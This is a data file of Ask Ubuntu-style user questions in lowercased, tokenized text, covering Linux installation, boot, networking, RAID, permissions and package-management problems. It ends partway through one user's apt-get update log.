520162	how do you properly install steam on elementary os ?	a week ago i tried to install steam , i downloaded the .deb package and installed it , and played a game with it . in the next day , steam prompted me with this : steam needs to install these additional packages : libgl1-mesa-dri : i386 , libgl1-mesa-glx : i386 , libc6 : i386 and then i did it , i installed those packages . but it broke my system . the next time i rebooted my system , i got straight to tty , no gui . i tried a bunch of things to fix it but the only way ( for me , a new guy to linx ) was to reinstall the system . now i 'm trying again to install it ( well it worked once ) , and i found on the internet that installing ia32-libs would fix steam , but when i was going to install it , apt-get said that it would need to remove elementary-desktop . this is bad . right now i do n't know how to install steam without breaking my system . what 's the proper way to install it ? some info : i have no off-board graphic card , only the one that comes with intel core i3 processor . ps : english is not my first language , please edit for clarity , then remove this comment !
520163	can i install ubuntu onto a usb flash drive using the same flash drive ?	when you make a usb bootable with ubuntu , it usually offers to either `` try ubuntu '' or `` install '' into the hard drive . `` try ubuntu '' does n't really save changes or treat the usb like a hard drive of its own . but that 's what i want : a portable hard drive with ubuntu os installed into it so i can boot from it on any computer , and have all my changes saved . and yes , i have enough room in the flash drive ( if 32 gigs is enough ) . i 've read on ask ubuntu that this is actually possible by choosing your flash drive from the custom install menu ( where it shows all the computer 's drives , including sdb , the flash drive ) . however , the answer i read suggested that i use an ubuntu dvd to make this work . can i install ubuntu onto a flash drive from that very flash drive itself ? i 've noticed that the `` try ubuntu '' interface still works even if i decide to unplug the flash drive , so perhaps the flash drive can install ubuntu onto itself ? it 's hard for me to word my question clearly , but i hope i did it well enough so that someone understands . thanks a ton : )
520164	no ethernet connection	i just upgraded from ubuntu 12.04 to 14.04 . i have no more internet connection . the wired connection is not detected and the wireless networks are detected but do not connect . was working fine on 12.04 . if config shows only lo & wlan0 , does not show eth0 thanks for the help louis
520165	ssh into ubuntu server ( 14.04.1 ) using mac terminal ( os version 10.9.4 ) ?	i am having difficulty connecting remotely to the ubuntu server from the mac terminal . so far i have run : sudo apt-get install openssh-server when i try to connect via the ip address i get an error : ssh root @ ip address the error is : ssh : connect to host ip address port 22 : connection refused . how do i go about resolving this ? thanks in advance for your help note : i am not actually typing ip address . i 'm just using this in place of my actual server ip address
520166	not able to install a new software or update installed packages on ubuntu 14.04	please see below the error logs : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 289211 files and directories currently installed . ) preparing to unpack ... /libmotif-common_2.3.4-5_all.deb ... unpacking libmotif-common ( 2.3.4-5 ) ... dpkg : error processing archive /var/cache/apt/archives/libmotif-common_2.3.4-5_all.deb ( -- unpack ) : trying to overwrite '/usr/include/x11/bitmaps/xm_hour32 ' , which is also in package motif 2.3.4-2 errors were encountered while processing : /var/cache/apt/archives/libmotif-common_2.3.4-5_all.deb error in function : dpkg : dependency problems prevent configuration of libxm4 : amd64 : libxm4 : amd64 depends on libmotif-common ( = 2.3.4-5 ) ; however : package libmotif-common is not installed . dpkg : error processing package libxm4 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libmrm4 : amd64 : libmrm4 : amd64 depends on libxm4 ( > = 2.3.4 ) ; however : package libxm4 : amd64 is not configured yet . dpkg : error processing package libmrm4 : amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libuil4 : amd64 : libuil4 : amd64 depends on libmrm4 ( > = 2.3.4 ) ; however : package libmrm4 : amd64 is not configured yet . libuil4 : amd64 depends on libxm4 ( > = 2.3.4 ) ; however : package libxm4 : amd64 is not configured yet . dpkg : error processing package libuil4 : amd64 ( -- configure ) : dependency problems - leaving unconfigured
520171	moving videos folder into hdd and having a link of it in ssd	so i currently have my /home on an ssd but i also have an hdd mounted to /mnt/hdd1 now , i want to keep the big files like movies on my hdd . how do i move the movies folder into my hdd while keeping the nice link in nautilus `` places '' menu ? i tried to just move the movies folder on hdd and then making a link of it but that seemed to just make a copy of the videos folder that i have on ssd .
520172	how to stop ubuntu about collecting personal informations	ubuntu distro collects personal information while using the system here is the link http : //www.ubuntu.com/legal/terms-and-policies/privacy-policy of how they collect personal information . can we able to stop those process .
520173	when terminal error , how do i write in terminal	i get an error when trying to open google chrome in the terminal . it says something in the terminal and i cant write anything in it because of the error message . the terminal does n't return to it 's normal state were you can write commands . how do i return to the normal start state where my home catalog is prompted . so i can write commands as usual . chrome is running fine thats not the problem . the problem is that i cant use the terminal due to the error message . error message : attention : default value of option force_s3tc_enable overridden by environment . [ 4249:4249:0904/195930 : error : desktop_window_tree_host_x11.cc ( 1478 ) ] not implemented reached in void views : :desktopwindowtreehostx11 : :mapwindow ( ui : :windowshowstate ) ca n't i click something to get the error message to disappear ? i still want to use google chrome .
520174	pastebinit gives me the wrong url when logged in a vagrant box	when i try to paste a certain file with pastebinit , i get the url of the website , instead of the url of the specific paste i wanted . i want to stress that this does not happen with all files ... here it works : vagrant @ vagrant-ubuntu-trusty-64 : ~ $ pastebinit -i .profile http : //paste.ubuntu.com/8249828/ here it fails : vagrant @ vagrant-ubuntu-trusty-64 : ~ # pastebinit -i /etc/phpmyadmin/config.inc.php http : //paste.ubuntu.com/ even with sudo fails : vagrant @ vagrant-ubuntu-trusty-64 : ~ # sudo pastebinit -i /etc/phpmyadmin/config.inc.php http : //paste.ubuntu.com/ weirdly this happens just inside a vagrant box where i am ssh'ed inside . on the local os works alright .
520175	how to install aptana studio 3 in ubuntu 14.04 ? with launcher shortcuts and dash search ?	i downloaded aptana studio 3 standalone version and extracted the folder in it . i tried to give executable permissions to aptanastudio3 . but i could not . i guess it happened because of the partition being ntfs formatted . so i moved the 'aptana_studio_3 ' folder to my home partition which is ext4 formatted . tried giving aptanastudio3 exec permissions again.. and it worked ! so far , so good ! now let me see if i can give it a `` launcher shortcut '' and `` searchable in launcher dash '' option . googling ... . sysads gnome panel moved the aptana_studio_3 to /opt and everything in there but it confused me , especially this line `` also click icon to choose the aptana icon in same location '' . anyway i removed gnome-panel after that . googling again ... . sam clarke aptana install in ubuntu 12.04 this link has been referred by many for installing aptana in ubuntu . i guess this works , for even ubuntu 14.04 . the folder is still in /opt . but even after i followed all the instructions in there , i could not get the launcher icon to work . i could run it , if i went to sudo /opt/aptana_studio_3/ and opened aptanastudio3 . and then i could even lock its orange-gears icon to the launcher bar . but once i closed aptana and clicked on the launcher icon again , it just blinks but nothing happens . aptana does n't open . googling again ... ( you must be frustrated by now , but please read on ) askubuntu solution /usr/bin here the 1st answer suggests to move the 'aptana_studio_3 ' to /usr/bin if i want to use terminal to open aptana . cool ! i like opening stuff through terminal . and since i have already tried everything else this ca n't hurt , right ? i even created a .desktop file on my own . here it is : [ desktop entry ] version=1.0 name=aptanastudio3 comment=aptana studio 3 exec=/usr/bin/aptana_studio_3/aptanastudio3 icon=/usr/bin/aptana_studio_3/icon.xpm terminal=false type=application categories=application ; ( i could n't do the markdown formatting properly here . ) but the same thing happens ... .. no icon ever appears on the launcher bar . i can lock the icon after opening aptana from /usr/bin/aptana_studio_3/ and the icon does n't open aptana again . help me . where am i going wrong ? maybe its because of the gnome-panel ? my .desktop file is wrong perhaps ?
520178	problem with premission	i 'm new to ubuntu , got it today and i 'm try to get metasploit tools with tutorial , after making a database and try to save it , it wont let me . i think because it try to save it to the my computer but the owner going to be root , but anyways i need to save it , what options i have ? error says : failed writing database.yml premissions denied .
520179	is there a generic solution for reactivating a window that has been `` minimized to tray '' ?	i have written a script that responds to a keyboard shortcut by , if it is not already open , execute the spotify application . if spotify is already opened , the script uses xdotool to activate the window ( bring it `` to the front '' ) . these work very well on their own -- but for one problem . if you `` close '' the spotify window ( hitting the x in the corner , for instance ) the window goes away completely and is only accessible through the system tray . spotify is still running , but xdotool can not activate the window -- it does nothing . how can i bring a `` closed '' window to the front in this case ? is it just impossible because of the way spotify is written ? xdotool will actually return the window 's id properly even when it 's closed . i 've tried the `` windowmap '' function and `` windowmove 0 0 '' , but neither effects any change , really . edit : user muru suggests re-executing spotify , in my case , which actually ends up mostly working , although it previously did not . it depends on how spotify handles being re-opened . i 'd love to hear of a generic solution if one exists .
520180	can not boot after boot-repair	i 've installed lubuntu 14.04 on an old pc , a packard-bell pentium 4 1,7ghz , with 1go memory ... i plan to turn it into a local server , to share movies , etc ... i have thus installed lubuntu 14.04 , but the graphic installer could'nt do it ... i burned an alternative cd and installed it from there ... the installation finished properly , but since then i can not boot from any source ( normal boot , recovery , livecd ) ... even when i choose try lubuntu wuthout installing it ... it 's blocked with the loading page . and pressing f1 to have the detail do n't do anything , neither pressing ctrl+alt+f1,2 , ... i 've tried several things ( an older version ) , it did n't work , and so i have burnt a boot-repair cd ... i ran it , and here is my boot info : ubuntu pastebin since then , it 's like nothing happened ... i 'm still blocked ... the only live cd that actually booted is the boot-repair-cd ...
520181	which terminal command for open google-chrome	how do i open the google chrome browser from the terminal without getting error ? google-chrome gets me error . no is not the same question but i probable should have written them in the same post . i apologize . i am not sure which command to use when open google chrome . so thats the question if google-chrome should be the right command to open google chrome . need to know if i do wrong or if something is wrong . sry for not beeing specific .
520183	organising audiobook folders with banshee	so banshee has me really confused . i have 2 folders - music and audiobooks which are empty . i move some m4b audiobooks into the audiobooks folder and i have unchecked that it should move them to the library . ( if its checked , it moves them into the music folder instead of the audiobooks one ) but i do have checked that it should keep the files and folders organised . when i do a refresh it loads the audiobooks into the music library again . huh ? even worse , it doesnt reorganised filenames or folders in the audiobooks folder . it has no effect . they are all named exactly the same as they were before and there is no folder structure . all i want is properly organised music and audiobook collections . i 've been trying to get it done for the last 3 days with rhythmbox and amarok and now banshee with zero luck . omg this should n't be that hard ! do n't other ubuntu users have collections of music and audiobooks ?
520185	can not write network share	i 'm trying to set up my personal computer to access my work file shares . i mounted successfully and i can read files just fine , but i have no write access . here is the line i added to my fstab : //srvfi/tests /media/tests cifs username=dbrown , password=****** , iocharset=utf8 , sec=ntlm 0 0 what do i add ? usually , this share is automatically added to my account on the windows 7 of the work computer . i just log into the server with the same information as my windows log-in .
520186	running apt-get past a proxy ?	ok so i know there are a lot of similar questions to this already , and i 'm a noob when it comes to linux btw . but i really need to know how to run sudo apt-get install program ( in this case a word processor ) through a proxy , every time i try it comes up with : 0 % [ connecting to proxy ( ip address ) ] and then it says `` 110 : connection timed out '' , followed by a lot of error messages like : err http : //link unable to connect to proxy : proxyport is there a way to successfully run sudo apt-get update/install etc . without having access to a proxy username and password ? basically , is there anything i can do ? thanks in advance
520187	sd mounted tails and partition . laptop stopped detecting	without changing anything and without updating , installing , modifying or anything , my minisd/sd adapter stopped working . i plug it in , start , go to boot menu and now it does n't come up as an option . i 've launched windows and checked the card , it 's still showing the proper gb left on the card , however it 's giving me an option to 'format the disk ' , which i do n't want to do , i can not lose this partitioned memory . what could have caused this to happen ? i shut down normal , ejected the card and placed it in safe-keeping . now , trying to use it , it just does n't boot up . when i f12 for boot menu without anything in the slot , it comes up fast . when i f12 for boot menu with it plugged in , there 's a noticeable delay in the next screen ( which shows boot options ) and the sd/usb does not display . help ?
520190	ubuntu 14.04 not shutting down properly	when i try to shut down my newly installed ubuntu 14.04 on my thinkpad t440p , it get stuck at the screen with the ubuntu logo and lighted dots . i saw there were other people that experienced this problem , but did not see answer that worked . i have tried many of the suggested possible answers with no success . shutdown -h now does not work either . does anyone know how to fix this ? other suggestions ? thanks .
520191	phpmyadmin wont let me log in without password	i am preparing a vagrant box to develop websites and i wanted to install phpmyadmin , to log in just as `` root '' , no password needed , since it is just for development , but whenever i try it , i get the error : login without a password is forbidden by configuration ( see allownopassword ) now i have been investigating for this issue and there are a serie of advices i found online , but neither did the trick . i added this 3 lines on /etc/phpmyadmin/config.inc.php : $ cfg [ 'servers ' ] [ $ i ] [ 'allownopassword ' ] = true ; $ cfg [ 'servers ' ] [ $ i ] [ 'allownopasswordroot ' ] = true ; $ cfg [ 'servers ' ] [ $ i ] [ 'user ' ] = `` root '' ; ... and even after that , it did not solve the issue . what am i missing ?
520196	ubuntu boot error premature end /casper/vmlinuz.efi	i 'm trying to install ubuntu and when i click on the try ubuntu before installing one it gives me this error error : premature end of file /casper/vmlinuz.efi . unaligned pointer 0xc0512c0b aborted . press any key to continue this is my first time using linux and needless to say i am very confused on what to do right now . edit : version 14.04
520197	do n't want laptop to suspend when closing lid	hi i have a sony vaio laptop with ubuntu 14.04 on it . i have a usb kb and mouse plugged in and a monitor plugged into the vga analogue output , i want to use it as a normal pc . when i close the lid of the laptop the monitor goes into 'digital power save ' and i think the laptop goes into suspend mode or something . i have gone into system settings and under the power settings 'when lid is closed ' i have set to 'do nothing ' but still i ca n't use the computer when lid is closed . also maybe related when i start some applications such as qbittorrent i can only see them on the laptop screen , not on the external lcd screen .
520200	dual boot windows 8.1 and ubuntu 14.04 no grub appearing going directly to windows	i was trying with my friend to install ubuntu 14.04 in dual boot mode with windows 8.1 uefi in my new toshiba laptop . the installation of ubuntu was finished successfully . however when i rebooted ( with secure boot disabled ) it is not showing any grub menu and directly going to windows . it is , i guess the similar situation to the following : boot repair : error occurred . i tried to fix this problem exactly the same way by using boot-repair . it finished with the following error message . `` an error occurred during the repair . please write on a paper the following url : http : //paste.ubuntu.com/8249722/ in case you still experience boot problem , indicate this url to : boot.repair @ gmail.com you can now reboot your computer . '' switching off the fast startup did not help as someone advised on forum previously . does anybody know what the problem is ? i would be very grateful for any advice .
520201	location of curl dns cache file and location of ubuntu global cache dns file	i have curl installed on my ubuntu instance . can any one let me know location of curl dns cache file as well the location of global cache dns file . i was going through the curl documentation and could not find any .
520203	no gateway ping in ubuntu and fedora , but ok on windows	i am facing a confusing problem . while using my home wifi on ubuntu 14.04 amd64 , my internet connection suddenly gives no response but in notification area it is shown as connected . i switched my wifi on and off , it connects to my device but still no response . my gateway is 192.168.1.1 , my mask is 255.255.255.0 , my ip is 192.168.1.38 but when i ping the gateway no result comes back . i restarted couple of times , same problem . then i restarted and boot into my fedora 20 x86_64 , same problem . then i restarted and boot into windows , no problem there . everything works . then i restarted and boot into ubuntu again , the problem is fixed ! ! ! ! this has happend to me so many times at home . can anyone tell me what is going on ? what extra information i should search about ? edit : i started downloading something and it happened again . here is my ifconfig -a : eth0 link encap : ethernet hwaddr c8:0a : a9 : bf : f6:34 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:563 errors:0 dropped:0 overruns:0 frame:0 tx packets:563 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49860 ( 49.8 kb ) tx bytes:49860 ( 49.8 kb ) wlan0 link encap : ethernet hwaddr c4:17 : fe : fb : b9:7a inet addr:192.168.1.38 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :c617 : feff : fefb : b97a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8200 errors:0 dropped:0 overruns:0 frame:0 tx packets:7495 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9052410 ( 9.0 mb ) tx bytes:920101 ( 920.1 kb ) and here is my route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 i also checked these commands after and before mysterious disconnection , i think results are the same . edit : i also stopped ufw and iptables services and then , here is my iptables -l -n -v chain input ( policy accept 2 packets , 352 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 21 packets , 1764 bytes ) pkts bytes target prot opt in out source destination and here is my arp -a ? ( 192.168.1.1 ) at ec:43 : f6 : fb:76:64 [ ether ] on wlan0 edit : here is my lspci -vvnn | grep -i wireless -a 10 : 09:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : lenovo device [ 17aa:30a1 ] control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 32 bytes interrupt : pin a routed to irq 18 region 0 : memory at f0100000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath9k
520207	how do i invert windows colors using compiz ?	does anyone know how to invert windows colors using compiz , in ubuntu 14.04 ? i installed compiz manager but the option is not visible .
520208	ca n't reboot mdraid	i just created a raid 0 array with the following commands : # install the necessary packages sudo apt-get install xfsprogs mdadm -y # create the raid 0 array . mdadm -- create -- verbose /dev/md0 -- level=stripe -- raid-devices=2 /dev/sd [ x ] /dev/sd [ x2 ] # create the xfs filesystem sudo mkfs.xfs /dev/md0 however , every time i reboot ( this second time without bothering to put any data on it ) , it always fails to mount and i have to press s to skip . i tried with either of the following lines in /etc/fstab : uuid= '' 8aba7867-e97b-4c4c-9aa3-f61d0de4434a '' /media/storage xfs defaults 0 2 /dev/md0 /media/storage xfs defaults 0 0 is there a step that i am missing when creating the raid array ? ( running ubuntu 14.04 64bit desktop with 1 ssd which the os is installed to and 2 x wd red 3tb )
520209	help with linksys wmp600n lubuntu	i installed lubuntu 14.04 on my desktop and it has an linksys wmp600n wireless card . it will not turn on for some reason but it does work , i had recently used on windows but don’t know what to do and this computer has internet through cable and it doesn’t show wireless in network connections and i don’t know if theirs a software button to turn it off and on with . it shows no wireless extension .
520210	ovh - dedi 14.04 server - raid reconfiguration help for a total noob	i am a linux noob and have been saddled with a problem far beyond my abilities . my situation is this : this box : http : //www.soyoustart.com/us/offers/bk-24t.xml ( 6x4tb drives ) ovh image based install of ubuntu 14.04 server - i do not have access to installation as i would if i were installing from dvd . i tell the cp what os i want installed and it returns an installed system based on their configuration . i do have some options , one of which is use distribution kernel . i can also choose a partition scheme via the web but it only exposes the first drive . i can choose to install all on one disk which would put / , /swap and /home all on that first disk . raid info after their os install : http : //pastebin.com/hgnk9znp ( asking in the official # ubuntu channel i am told that : `` that 's 1 disk with 5 mirrors and zero spares . it has 5 allocated mirrors - it 's a very bad config '' . ) edit : is it possible they have just screwed up when setting up the raid ? could it just be down to human error on their part ? desired outcome : raid1 system and swap disk do i have to allocate a whole disk to this or can i use part of one ? sys and swap will never need 4tb will they ? as i understand it , and if a whole disk is used , this would be 4tb storage and 1 drive redundancy ( eg a mirror of that drive ) . raid5 for the remaining 4 drives as one big volume on which /home lives . as i understand it , with raid5 this would provide 12tb of storage and single drive redundancy . obstacles i am not a linux geek i am unable to alter the way the os is installed . i do have a 'recovery mode ' which loads an image via the net and allows me to work with the various systems on the installed os . i can , for example , run parted but apt-get does n't work . i have no idea how to get from the raid array listed above to the config i have described . i am stuck with this server and this provider . complete loss of data is fine if i end up where i need to be . i have looked at some official documentation but it seems out of date or is otherwise inapplicable . specifically these resources : help.ubuntu.com/community/installation/softwareraid help.ubuntu.com/community/fakeraidhowto www.tldp.org/howto/lvm-howto/ edit 2 : the advice i got from # ubuntu is : `` basically , break the 5 mirrors , create new raid 5/6 array out of them , that is it ( if you do n't want to touch the root disk ) . once thats done , remove the remaining 1 disk raid 1 out of raid configuration as there are no more mirrors for it , you need to remove it . i advise you to mark the 5 mirrors as `` failed '' before removing them so it thinks the disks have failed before you disable them . while that makes sense conceptually , the practical application of that advice is beyond my current understanding . i 've tried to be comprehensive in describing my problem , but i am sure i have left salient details out . please ask for clarification where needed . thanks : d update 2014.09.05 i have re installed the os using the custom installation option and the install entirely on first disk option in the partition scheme dialogue . this leaves the remaining drives completely untouched . this means i should be able to set them up as a new raid array instead of having to undo the default raid array as installed .
520211	login loop , ubuntu noob - absolutely can not access my machine	my pc wo n't let me in any more ... it just happened now , unexpectedly , when i came home . the login screen was slightly changed , as in the name of the user ( the same as appears in the shell , not the name of my user account ) appeared in the top left corner -- in grey -- and some symbols including the language , volume , and shut down symbols that are usually there in the right corner are now also displayed in grey . when i try to log in with my password , i get bounced back to the login page straight away . if i type in a wrong password , it tells me that it 's wrong . i also can not log into the guest account ... it really feels like i just did something very minor wrong , like press a certain key combination that made something happen that now keeps me from logging in until i redo the combination . but really , it might be anything at all ... i 'm completely lost and would appreciate help . i tried playing around with the xauthority and lightdm explained in the thread here : ubuntu gets stuck in a login loop but there was no satisfying results and really i do n't know my stuff nearly well enough to find my answers from hints . please , help ! c .
520213	fn key working nondeterministically	i 'm having a problem with my toshiba satellite running ubuntu 14.04 . the fn key is working nondeterministically , causing unintended consequences for my computer . as an example , as we all know , f5 is the browser refresh key . however , f5 is also the key that causes the display to change between the main display and an external monitor . sometimes when i press f5 with a browser open , the page will refresh and when i press fn + f5 the display will change , and sometimes the opposite happens , seemingly at random ( although it changes only when the computer reboots ; the behaviour is constant as long as the computer is not rebooted ) . to answer the obvious question : the fn key is not sticky as best as i can tell .
520215	new ( computer-illiterate ) ubuntu user needs information	i am in need of an operating system for my new laptop which was donated to me . i have no idea how to download/work this computer . it will be used by my children for their school work mostly . i do n't have the internet at home except for on my cell phone , and i am still fuddling around with that on how to use it . in the directions online , it states to download ubuntu onto a stick drive . does this mean that i can download it on my cell phone and transfer it to the sd card and then use the sd card on the laptop to download the ubuntu operating system ? also , i do not have any internet at home , as i can not afford it at this time . is an operating system the same thing as the internet ? or do i have to find a free or discounted rate internet , for the laptop to work ? thank you & god bless ,
520216	return only line number , if pattern 'exist ' and 'not exist ' . using 'grep ' command	i have this sample file for my input : xyxxyx xyxx xxyx yxyy yxyx xxyxxx xx xyx xxx x y x xxyy yxxy xyxxy xxy y x y xyxy xyx yyxx xyyxyxy xyx yxyy xyy yxyx xxyxyyx and i tried to find only `` xyx '' word if exist in line and return line number . for example in this input just line 2 and 4 have `` xyx '' , and the result i desired is only would be 2 and 4 ( line numbers ) but grep command give me all 5 lines . this result : grep -n `` xyx '' test | cut -f1 -d : 1 2 3 4 5 if i run follow command without cut -f1 -d '' i see that find all `` xyx '' such as in `` xyxxyx '' , `` xyxx '' , `` xxyx '' and `` yxyx '' for example in first line , while that is wrong , my pattern only and only exist in line 2 and 4 and it is third word in line 2 and second & 5th word in line 4 . see the screen shot : and the result what i want is , only find separated `` xyx '' and return line number of that . output of i desired if pattern exist , it is just : 2 4 output of i desired if pattern not exist , it is just : 1 3 5 and also i do n't know which command i should use to check if pattern not exist . i tried with all possible combination of grep command but i failed . thank you for helping in advance .
520217	unable to install ap-hotspot ubuntu 13.04	am able to connect to wifi networks with my ralink adaptor ( 5370 ) . i wanted to create wifi-hotspot with it ( supports mastermode ) am trying to install ap-hotspot through below commands sudo add-apt-repository ppa : nilarimogard/webupd8 sudo apt-get update sudo apt-get install ap-hotspot but getting 404 error while sudo apt-get update command and sudo apt-get install ap-hotspot please find the output sriansh @ sriansh-pc : ~ $ sudo add-apt-repository ppa : nilarimogard/webupd8 you are about to add the following ppa to your system : the main web upd8 ppa maintained by : http : //www.webupd8.org/ to add this ppa , simply paste this in a terminal : sudo add-apt-repository ppa : nilarimogard/webupd8 packages in this ppa : audacious , ap-hotspot , awn-applet-radio , awn-applet-wm , calise , cmus , dockbarx , dockbarx-themes-extra , dropbox-share , emerald , exaile , fbmessenger , gnome-subtitles , gnome-window-applets , grsync , grive , gthumb , launchpad-getkeys , mc , mdm ( mint display manager ) , minitunes , minitube , musique , notifyosdconfig , nautilus-columns , powertop , ppa-purge , rosa-media-player , fixed pulseaudio-equalizer , subtitleeditor , syncwall , umplayer , unity-reboot , wimlib , youtube-dl , xfce4-dockbarx-plugin , xournal , yad and others . almost all packages are updated to their latest version . for other ( specialized ) ppas we maintain , see : https : //launchpad.net/~webupd8team more info : https : //launchpad.net/~nilarimogard/+archive/ubuntu/webupd8 press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpeu591r/secring.gpg ' created gpg : keyring `/tmp/tmpeu591r/pubring.gpg ' created gpg : requesting key 4c9d234c from hkp server keyserver.ubuntu.com gpg : /tmp/tmpeu591r/trustdb.gpg : trustdb created gpg : key 4c9d234c : public key `` launchpad webupd8 '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok sriansh @ sriansh-pc : ~ $ sudo apt-get update hit http : //ppa.launchpad.net raring release.gpg ign http : //in.archive.ubuntu.com raring release.gpg ign http : //extras.ubuntu.com raring release.gpg hit http : //ppa.launchpad.net raring release.gpg ign http : //in.archive.ubuntu.com raring-updates release.gpg ign http : //extras.ubuntu.com raring release ign http : //security.ubuntu.com raring-security release.gpg hit http : //ppa.launchpad.net raring release ign http : //in.archive.ubuntu.com raring-backports release.gpg hit http : //ppa.launchpad.net raring release ign http : //in.archive.ubuntu.com raring release ign http : //security.ubuntu.com raring-security release hit http : //ppa.launchpad.net raring/main i386 packages ign http : //in.archive.ubuntu.com raring-updates release ign http : //security.ubuntu.com raring-security/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-backports release ign http : //in.archive.ubuntu.com raring/main sources/diffindex ign http : //security.ubuntu.com raring-security/multiverse i386 packages/diffindex hit http : //ppa.launchpad.net raring/main i386 packages ign http : //in.archive.ubuntu.com raring/restricted sources/diffindex ign http : //security.ubuntu.com raring-security/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com raring/universe sources/diffindex ign http : //in.archive.ubuntu.com raring/multiverse sources/diffindex ign http : //security.ubuntu.com raring-security/main i386 packages/diffindex ign http : //in.archive.ubuntu.com raring/main i386 packages/diffindex ign http : //in.archive.ubuntu.com raring/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com raring/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com raring/multiverse i386 packages/diffindex err http : //extras.ubuntu.com raring/main sources 404 not found err http : //extras.ubuntu.com raring/main i386 packages 404 not found ign http : //extras.ubuntu.com raring/main translation-en_in ign http : //extras.ubuntu.com raring/main translation-en ign http : //in.archive.ubuntu.com raring-updates/main sources/diffindex ign http : //in.archive.ubuntu.com raring-updates/restricted sources/diffindex ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //in.archive.ubuntu.com raring-updates/universe sources/diffindex ign http : //ppa.launchpad.net raring/main translation-en ign http : //in.archive.ubuntu.com raring-updates/multiverse sources/diffindex ign http : //ppa.launchpad.net raring/main translation-en_in ign http : //in.archive.ubuntu.com raring-updates/main i386 packages/diffindex ign http : //ppa.launchpad.net raring/main translation-en ign http : //in.archive.ubuntu.com raring-updates/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-updates/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-updates/multiverse i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-backports/main sources/diffindex ign http : //in.archive.ubuntu.com raring-backports/restricted sources/diffindex ign http : //in.archive.ubuntu.com raring-backports/universe sources/diffindex ign http : //in.archive.ubuntu.com raring-backports/multiverse sources/diffindex ign http : //in.archive.ubuntu.com raring-backports/main i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-backports/restricted i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-backports/universe i386 packages/diffindex ign http : //in.archive.ubuntu.com raring-backports/multiverse i386 packages/diffindex ign http : //security.ubuntu.com raring-security/main translation-en_in ign http : //security.ubuntu.com raring-security/main translation-en ign http : //security.ubuntu.com raring-security/multiverse translation-en_in ign http : //security.ubuntu.com raring-security/multiverse translation-en ign http : //security.ubuntu.com raring-security/restricted translation-en_in ign http : //security.ubuntu.com raring-security/restricted translation-en ign http : //security.ubuntu.com raring-security/universe translation-en_in ign http : //security.ubuntu.com raring-security/universe translation-en err http : //security.ubuntu.com raring-security/restricted i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com raring-security/multiverse i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com raring-security/universe i386 packages 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com raring-security/main i386 packages 404 not found [ ip : 91.189.91.14 80 ] ign http : //in.archive.ubuntu.com raring/main translation-en_in ign http : //in.archive.ubuntu.com raring/main translation-en ign http : //in.archive.ubuntu.com raring/multiverse translation-en_in ign http : //in.archive.ubuntu.com raring/multiverse translation-en ign http : 